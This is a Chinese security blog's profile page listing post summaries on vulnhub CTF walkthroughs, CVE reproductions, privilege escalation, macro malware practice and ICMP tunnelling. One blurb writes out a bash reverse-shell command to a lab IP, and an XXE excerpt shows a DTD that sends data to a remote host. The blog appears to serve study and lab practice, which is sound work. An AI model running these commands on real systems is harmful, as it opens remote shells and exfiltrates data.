自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+

守拙的博客

自我学习和技术分享

  • 博客(31)
  • 收藏
  • 关注

原创 【打靶练习】vulnhub: my-cmsms

弱口令、代码审计、信息收集

2024-04-10 09:57:22 626

原创 【打靶练习】vulnhub: stapler

密码爆破文件读取多看看 wp-content/uploads/ 目录历史命令http和https

2024-03-28 11:33:59 456

原创 【打靶练习】vulnhub: haclabs

haclabs靶机打靶记录,图片隐写、命令执行绕过

2024-03-20 09:34:13 394

原创 【打靶练习】vulnhub: Insanity-Hosting

Insanity-Hosting打靶记录,二次sql注入、firefox本地密码提取

2024-03-19 10:24:27 466

原创 【打靶练习】vulnhub: Natraj

Natraj靶机操作练习,文件包含、日志注入、apache配置提权、nmap提权

2023-07-23 21:03:06 224

原创 【打靶练习】vulnhub: loly

loly靶机操作练习,主要为wordpress渗透

2023-07-23 12:57:00 253

原创 【打靶练习】vulnhub Sar: 1

方式反弹shell均失败,猜测在这个环境下很多命令无法执行,可以利用文件上传上传一个webshell,或者上传一个php的反弹shell脚本,然后触发执行。收集到的信息:系统Ubuntu、软件apache、默认web路径/var/www/html/index.html。发现定时任务中,root用户通过finally.sh执行了write.sh,而write.sh当前用户可写。同时,发现存在文件上传功能,但是不知道上传路径无法直接利用。经过搜索,发现文件上传路径为/var/www/html/

2023-06-13 14:42:10 153

原创 【打靶练习】 Vulnhub:Cute

靶机下载地址:难度:简单。

2023-06-13 09:24:27 163

原创 windows 32位缓冲区溢出漏洞

windows32位系统缓冲区溢出漏洞实践,syncbreeze软件缓冲区溢出漏洞

2022-11-08 23:29:59 461 1

原创 【Vulnhub靶场实践】 Red:1

保姆级教程,red:1靶机一篇搞定。不只是简单记录操作步骤,磁盘爆满、shell显示乱序、反弹shell闪退等问题都有相应的解决方案。

2022-07-19 15:01:44 945

原创 CISSP考试分享

CISSP相关信息、个人建议、关键知识、学习资源分享

2022-07-17 08:22:08 654

原创 XSS漏洞挖掘笔记

一些 XSS 漏洞挖掘的知识点和技巧

2022-05-30 21:28:32 581

原创 BurpSuite 插件开发指南系列文章导航

burp插件编写指南自用导航

2022-05-04 16:50:56 1913

原创 CVE-2022-22965 漏洞复现学习

漏洞利用条件JDK 9+Spring 及其衍生框架使用Tomcat部署spring项目使用了POJO参数绑定Spring Framework 5.3.X < 5.3.18 、2.X < 5.2.20 或者其他版本环境搭建Java 靶场JDK 11(必须9及9以上)Tomcat 8首先需要个实体类sdfsdfpublic class HelloWorld { private String message; public String getM

2022-04-30 21:27:30 3012

原创 Windows个人版远程桌面多用户设置

Windows个人版远程桌面多用户同时登陆,RDP Wrapper软件的安装使用

2022-04-22 22:20:41 3051

原创 CVE-2014-3529

一、 漏洞影响poi-ooxml3.10及以下二、环境搭建1. 漏洞环境使用大佬的java靶场:https://github.com/JoyChou93/java-sec-code.git。在C盘下新建1.txt,文件内容为success,用于演示文件读取2. 使用python起一个web服务用来加载远程dtd文件,在web服务目录下放置一个xxe.dtd<!ENTITY % all "<!ENTITY &#x25; send SYSTEM 'http://192.168.

2022-02-28 22:04:06 4909 1

转载 JBoss简介

JBoss简介

2022-02-16 10:40:47 4610

原创 Log4j2 RCE漏洞复现

最新log4j rce漏洞复现

2021-12-10 23:44:53 4486

原创 Shiro反序列化漏洞研究

shiro反序列化漏洞研究实践,shiro-550 POC,shiro-721破解过程剖析,为什么shiro-721需要登录才能利用?

2021-10-31 23:11:10 409

原创 cobaltstrike 宏病毒实践

cobaltstrike 宏病毒利用实践

2021-09-12 22:50:03 662

原创 利用 mysql ufd 进行系统提权

MySQL UFD提权实践

2021-09-12 22:42:28 702

转载 代码审计工具

代码审计工具推荐

2021-09-07 22:02:46 1120

原创 Linux反弹 shell 命令解析

Linux 反弹 shell 命令 bash -i > /dev/tcp/192.168.139.149/4444 0>&1 各部分代表的意思。

2021-08-29 22:57:20 578

原创 FastJson反序列化系列漏洞分析

fastsjon 1.2.24-1.2.68 多个版本反序列化漏洞的分析复现

2021-08-29 08:51:27 3119 1

原创 redis未授权访问利用实践

redis未授权访问利用实践

2021-08-28 20:51:09 110

原创 shiro认证绕过:CVE-2020-(1957,17523)

Apache Shiro多个版本中存在认证绕过漏洞。攻击者可构造特殊的请求绕过身份验证访问目标服务。

2021-08-12 22:42:47 1114

原创 Freemarker模板注入:CVE-2020-7477

一、漏洞名称:FusionAuth存在Freemarker模板注入导致远程命令执行二、漏洞编号:CVE-2020-7477三、漏洞描述:在FusionAuth 1.11.0之前版本存在注入漏洞,经过身份验证的用户被允许编辑电子邮件模板或主题, 远程攻击者可利用该漏洞调用在系统上执行任意命令。四、影响版本:FusionAuth <= 1.11.0五、漏洞分析通过对直接编辑freemarker模板,调用freemarker.template.utility.E

2021-08-04 21:06:48 2223

原创 XML注入:CVE-2020-29436

一、漏洞名称:Nexus Repository Manager 3 XML外部实体注入二、漏洞编号:CVE-2020-29436三、漏洞描述:2020年12月16日,360CERT监测发现Nexus Repository Manager 3发布了Nexus Repository Manager 3 命令注入漏洞 的风险通告,该漏洞编号为 CVE-2020-29436 ,漏洞等级:高危 ,漏洞评分:8.7 。拥有管理员权限的远程攻击者通过 构造特定的XML请求 ,可造成 XML外部实体注

2021-07-21 21:58:14 640 2

原创 SQL注入:布尔注入脚本

SQL注入:布尔注入脚本实现思路将payload以字典形式存储,循环遍历时对payload字符串中相应参数进行格式化。按以下顺序依次获取数据,其实四个步骤逻辑一样,都是先获取数量,然后获取长度,最后获取内容。数据库名:获取库名长度,库名数据库表:获取数据库表数量,表名长度,表名表字段:获取字段数,字段名长度,字段名表数据:获取该字段数据行数,数据长度,数据内容关键代码获取不同数据的payload字典payload_dict = { "db_name_len":

2021-07-19 21:02:05 860 1

原创 提权:CVE-2021-3560

CVE-2021-3560一、漏洞名称:Linux Polkit权限提升漏洞二、漏洞编号:CVE-2021-3560三、漏洞描述:由于linux的polkit组件错误处理了异常情况,导致权限提升。该漏洞能够使普通用户获取到root权限。四、影响版本:目前已知的版本情况。五、漏洞分析当一个命令被发送到目标程序处理时,消息发送方会被分配一个唯一总线名称(感觉有点像sessionid的意思)。当需要polkit去做权限校验时,polkit会通过唯一总线名称去查询命令发送方的U

2021-07-12 21:05:14 1102

原创 icmpsh使用

ICMP隧道:将TCP/UDP数据封装到ICMP的ping数据包中,从而穿过防火墙(防火墙通常不会过滤ping数据包),通常用于内网攻击中的绕过防火墙建立C2tongda。常用的ICMP隧道工具有icmpsh、PingTunnel、icmptunnel、powershell icmp等。下载地址:https://github.com/bdamele/icmpsh使用前提: 目标主机为windows系统 本地机器安装python2环境,安装impacket类库 利用icmpsh

2021-07-11 15:14:47 1000 1

打靶练习vulnhub: my-cmsms

打靶练习vulnhub: my-cmsms

2024-04-10

打靶练习vulnhub: stapler

打靶练习vulnhub: stapler

2024-03-28

打靶练习vulnhub: haclabs

打靶练习vulnhub: haclabs

2024-03-20

打靶练习vulnhub:Insanity-Hosting

打靶练习vulnhub:Insanity-Hosting

2024-03-19

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除